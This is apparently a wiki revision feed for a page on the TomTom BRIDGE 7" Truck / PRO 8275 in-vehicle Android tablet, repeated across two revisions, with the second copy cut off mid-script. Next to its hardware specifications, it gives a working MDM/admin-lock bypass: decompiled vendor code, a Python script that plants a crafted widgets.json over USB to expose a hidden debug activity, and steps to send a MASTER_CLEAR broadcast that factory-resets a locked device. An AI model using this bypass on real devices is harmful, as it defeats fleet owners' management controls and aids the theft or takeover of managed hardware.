&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 4.3 with kernel patched up to 14 Jun 2017 and build 17.223.2780796.4807.122 OS italia-rel-17.2.21095) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable function in the WidgetInfoFetcher class in question.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot; highlight=&amp;quot;36&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
File:Error after injection.jpg|Error after injection&lt;br /&gt;
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen&lt;br /&gt;
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Unlocking Factory Tools ===== &lt;br /&gt;
Go to About your TomTom device. Now tap Model number 5 times.&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
File:Factory tools.jpg|Factory Tools&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3306</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3306"/>
		<updated>2026-04-04T01:37:15Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add inf&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Tomtom0.png|right|300px]]&lt;br /&gt;
[[File:Tomtom1.png|right|300px]]&lt;br /&gt;
&lt;br /&gt;
== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 4.3 with kernel patched up to 14 Jun 2017 and build 17.223.2780796.4807.122 OS italia-rel-17.2.21095) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;font-size: 90%; max-width: 600px;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable function in the WidgetInfoFetcher class in question.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot; highlight=&amp;quot;36&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
